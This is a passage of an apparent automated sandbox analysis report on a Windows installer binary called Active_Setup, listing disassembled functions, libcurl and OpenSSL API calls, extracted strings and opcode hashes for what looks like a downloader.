                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3572d0baf12277ee581a210d45db93e7d89c885c917108a7d52af49e3af25347
                                                                                                                                                  • Instruction ID: 28aed52c857b8e21ad544407b5c166d4647221c90a1eb8a6918b59f73c2c7bc9
                                                                                                                                                  • Opcode Fuzzy Hash: 3572d0baf12277ee581a210d45db93e7d89c885c917108a7d52af49e3af25347
                                                                                                                                                  • Instruction Fuzzy Hash: 681106267083510FC715CE3A98E11ABFBD3BBDA210F999A6DD5C6CB346C920D90BC745
                                                                                                                                                  Function 00FC94F0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%5lld,0C868B00,010E8004,tP8g,010E8004,00FC9F48,0C868B00,3B000001,?,?,?,?,?,tP8g), ref: 00FC9516
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC953E
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%4lldk,00000000,?,0C868B00,010E8004,00000400,00000000,tP8g,010E8004,00FC9F48,0C868B00,3B000001), ref: 00FC954D
                                                                                                                                                  • __allrem.LIBCMT ref: 00FC9571
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC957F
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC958F
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%2lld.%0lldM,00000000,?,0C868B00,010E8004,00100000,00000000,00000000,?,00000000,?,00019999,00000000,0C868B00), ref: 00FC959E
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC95C3
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%4lldM,00000000,?,0C868B00,010E8004,00100000,00000000,tP8g,010E8004,00FC9F48,0C868B00,3B000001), ref: 00FC95D2
                                                                                                                                                  • __allrem.LIBCMT ref: 00FC95F3
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC9601
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC9611
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%2lld.%0lldG,00000000,?,0C868B00,010E8004,40000000,00000000,00000000,?,00000000,?,06666666,00000000,0C868B00), ref: 00FC9620
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC9644
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%4lldG,00000000,?,0C868B00,010E8004,40000000,00000000,tP8g,010E8004,00FC9F48,0C868B00,3B000001), ref: 00FC9653
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC9677
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%4lldT,00000000,?,0C868B00,010E8004,00000000,00000100,tP8g,010E8004,00FC9F48,0C868B00,3B000001), ref: 00FC9686
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC969C
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000006,%4lldP,00000000,?,0C868B00,010E8004,00000000,00040000,tP8g,010E8004,00FC9F48,0C868B00,3B000001), ref: 00FC96AB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                                                  • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld$tP8g
                                                                                                                                                  • API String ID: 3299120379-1947200030
                                                                                                                                                  • Opcode ID: fbeca1f9ffb5500b1c4fdfce474cdf6aeec39677e8a55a3fb42f762c38b9461c
                                                                                                                                                  • Instruction ID: 0588001e4e220ad34abbaabd16ad3e52ba616718106bfc0dc35e8ced7075e052
                                                                                                                                                  • Opcode Fuzzy Hash: fbeca1f9ffb5500b1c4fdfce474cdf6aeec39677e8a55a3fb42f762c38b9461c
                                                                                                                                                  • Instruction Fuzzy Hash: D841C9F1B8430235F432319A6D47F6B616D9BE1F24F14482DFA41FA0C2D5D6E851607D
                                                                                                                                                  Function 00FCE700 Relevance: 45.9, APIs: 12, Strings: 14, Instructions: 374COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000021,%08x%08x%08x%08x,00000000,00000000,00000000), ref: 00FCE813
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%s:%s,?,?,?,Digest,?,00000000,00000000), ref: 00FCE862
                                                                                                                                                    • Part of subcall function 00FCE660: curl_msnprintf.ACTIVE_SETUP(?,00000003,%02x,?,?,00000000,00FCE89C), ref: 00FCE673
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%s:%s,?,00000000,?), ref: 00FCE8B3
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%.*s,?,00000000,?), ref: 00FCE90D
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%s,?,?), ref: 00FCE922
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%s,00000000,d41d8cd98f00b204e9800998ecf8427e), ref: 00FCE950
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%s:%08x:%s:%s:%s,?,?,?,?,?,?), ref: 00FCE9BC
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s:%s:%s,?,?,?), ref: 00FCE9DB
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s",Proxy-,00000000,?,?,?,?,?,?,?), ref: 00FCEA60
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s",Proxy-,00000000,?,?,?,?), ref: 00FCEAB0
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s, opaque="%s",00000000,?), ref: 00FCEAE2
                                                                                                                                                  • curl_maprintf.ACTIVE_SETUP(%s, algorithm="%s",?,?), ref: 00FCEB12
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_maprintf$curl_msnprintf
                                                                                                                                                  • String ID: %08x%08x%08x%08x$%s, algorithm="%s"$%s, opaque="%s"$%s:%.*s$%s:%s$%s:%s:%08x:%s:%s:%s$%s:%s:%s$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s"$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"$Digest$Proxy-$auth$auth-int$d41d8cd98f00b204e9800998ecf8427e
                                                                                                                                                  • API String ID: 1854414677-2523086975
                                                                                                                                                  • Opcode ID: 323176d3b38948aa15f2a03f2cfdd0be62b05ee30f74c980c3c49e96a2674b5d
                                                                                                                                                  • Instruction ID: 376ced448d4bd128144d725bd3b4142fe10572d66b02ea3c402a11e30a8700ad
                                                                                                                                                  • Opcode Fuzzy Hash: 323176d3b38948aa15f2a03f2cfdd0be62b05ee30f74c980c3c49e96a2674b5d
                                                                                                                                                  • Instruction Fuzzy Hash: 89D1ADB1900602AFD720DB65CD46FABB7A8BF84714F04492DF9899B201E735E914DBE2
                                                                                                                                                  Function 00FC810E Relevance: 35.2, APIs: 2, Strings: 18, Instructions: 211COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00FC10F0: curl_mvsnprintf.ACTIVE_SETUP(?,00000801,?,?,00FBEBDD), ref: 00FC1133
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(00000000,00002000,%lx,00000000,?, Version: %lu (0x%lx),00000001,00000000,?,?,00000000,Issuer,00000000,?, Issuer: %s,00000000), ref: 00FC81B0
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(00000000,00002000,%lx,00000000,?, Serial Number: %ld (0x%lx),00000000,00000000,00000000), ref: 00FC81FE
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(00000004,00000003,%02x%c,-00000009,-00000009), ref: 00FC837F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf$curl_mvsnprintf
                                                                                                                                                  • String ID: Expire date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %ld (0x%lx)$ Signature Algorithm: %s$ Start date: %s$ Unable to load public key$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$Expire date$Issuer$Public Key Algorithm$Serial Number$Signature Algorithm$Start date$Subject$Version
                                                                                                                                                  • API String ID: 405648482-1965205160
                                                                                                                                                  • Opcode ID: 2af2ded2a154571c74238510327c0bd0465767ee120da26159dec49e32529108
                                                                                                                                                  • Instruction ID: ce2a52a9ca53980386f6fb9503a9df8c2083bea77506b05ee9079def12bb453e
                                                                                                                                                  • Opcode Fuzzy Hash: 2af2ded2a154571c74238510327c0bd0465767ee120da26159dec49e32529108
                                                                                                                                                  • Instruction Fuzzy Hash: 4A51A275A443067BD200BA52CD83F2F76ADAF86788F14041CF8456B203DA2DBD01A6F6
                                                                                                                                                  Function 01052B40 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 120libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 01052B69
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 01052BB6
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 01052BBF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$CreateToolhelp32Snapshot$KERNEL32.DLL$Module32First$Module32Next
                                                                                                                                                  • API String ID: 145871493-1549069882
                                                                                                                                                  • Opcode ID: a55c0c85570e80e04ce448d6544de68851e91a74227523d1d47e2f26b6130007
                                                                                                                                                  • Instruction ID: 6ff08fc07eb89ceb9b6a6a9edfbcd32326420c3b0d91001ce34340c1974a0d7b
                                                                                                                                                  • Opcode Fuzzy Hash: a55c0c85570e80e04ce448d6544de68851e91a74227523d1d47e2f26b6130007
                                                                                                                                                  • Instruction Fuzzy Hash: 1831E571744346ABD320BBA8DC5AFAF7AD9BF99740F400019F6C5D61C1EAB9D40087AA
                                                                                                                                                  Function 00FB2720 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00002712,?), ref: 00FB2763
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB276D
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000034,00000001,00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB2777
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,0000003A,00000001,00000000,00000034,00000001,00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB2781
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000063,00000001,00000000,0000003A,00000001,00000000,00000034,00000001,00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB278B
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,0000004B,00000001,00000000,00000063,00000001,00000000,0000003A,00000001,00000000,00000034,00000001,00000000,00000044,0000000A,00000000), ref: 00FB2795
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00002722,easeus-downloader/1.0), ref: 00FB27A8
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27B2
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000051,00000000,00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27BC
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00004E2B,00FB2440,00000000,00000051,00000000,00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27CC
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000013,00000001,00000000,00004E2B,00FB2440,00000000,00000051,00000000,00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27D6
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(00000000,00000014,00000014,00000000,00000013,00000001,00000000,00004E2B,00FB2440,00000000,00000051,00000000,00000000,00000040,00000000,00000000), ref: 00FB27E0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_easy_setopt
                                                                                                                                                  • String ID: easeus-downloader/1.0
                                                                                                                                                  • API String ID: 2879491745-3247282751
                                                                                                                                                  • Opcode ID: 3fa3795d27871bcd8e0af2f61725267d1b200faf8dbe71dfc83017f35fa58d31
                                                                                                                                                  • Instruction ID: 26efd65e08085963581c9f7f09d8da1f72b182ae5f6d99dc17db004ce4d9b75d
                                                                                                                                                  • Opcode Fuzzy Hash: 3fa3795d27871bcd8e0af2f61725267d1b200faf8dbe71dfc83017f35fa58d31
                                                                                                                                                  • Instruction Fuzzy Hash: A22193B2788B1076E522BB168C83FDFB29D9F19F00F404404F345791D6DBAEA6416A9F
                                                                                                                                                  Function 01079390 Relevance: 21.5, APIs: 5, Strings: 7, Instructions: 467COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\ssl\s23_srvr.c$CONNECT$GET $HEAD $POST $PUT $s->version <= TLS_MAX_VERSION
                                                                                                                                                  • API String ID: 909875538-1747794495
                                                                                                                                                  • Opcode ID: ba9ea9f2b1f3da97b9e3549f3f9960023df43a74c79720670112b4416e60e211
                                                                                                                                                  • Instruction ID: 81397db829232449048df4956a259cfe232d86ec2fee87be0423c70ca30cb53d
                                                                                                                                                  • Opcode Fuzzy Hash: ba9ea9f2b1f3da97b9e3549f3f9960023df43a74c79720670112b4416e60e211
                                                                                                                                                  • Instruction Fuzzy Hash: 10022570E04346AFE7218F29CC91BA6BBE0BF4472CF04815EE9C95B282D3B5E155CB95
                                                                                                                                                  Function 00FD0FE0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 227COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncpy$_fgetscurl_maprintf
                                                                                                                                                  • String ID: $%s%s%s$HOME$_netrc$login$machine$password
                                                                                                                                                  • API String ID: 3602019725-1454648440
                                                                                                                                                  • Opcode ID: 5934fd01e3679576387f701d610c1070938b81fb025c2c9a6c325d467a8a1271
                                                                                                                                                  • Instruction ID: 02341742fc9a7d80977da9531b9445b14ba4730bc7f2e8274c620159ea5417d4
                                                                                                                                                  • Opcode Fuzzy Hash: 5934fd01e3679576387f701d610c1070938b81fb025c2c9a6c325d467a8a1271
                                                                                                                                                  • Instruction Fuzzy Hash: 9E715771D0C381BBD320DA618C46FABBADABF84754F48091EF4C59A340D675CA48D793
                                                                                                                                                  Function 00FB24E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 178synchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB2526
                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00FB25BC
                                                                                                                                                  • _memset.LIBCMT ref: 00FB25D0
                                                                                                                                                  • __snprintf.LIBCMT ref: 00FB25F7
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(?,00002717,?), ref: 00FB260E
                                                                                                                                                  • curl_easy_setopt.ACTIVE_SETUP(?,00002711,?), ref: 00FB2631
                                                                                                                                                  • curl_easy_perform.ACTIVE_SETUP(?), ref: 00FB263A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_easy_setopt$MutexObjectReleaseSingleWait__snprintf_memsetcurl_easy_perform
                                                                                                                                                  • String ID: %llu-%llu
                                                                                                                                                  • API String ID: 478814842-3095788464
                                                                                                                                                  • Opcode ID: 3a5d4762c834865d35b5c0fa67e13f5411f8cbc2c9dfe980f83a80893de7f5a7
                                                                                                                                                  • Instruction ID: bb6b861a997b240db55decc2bf51d34defaa9906512d6aaf73fab068e9634169
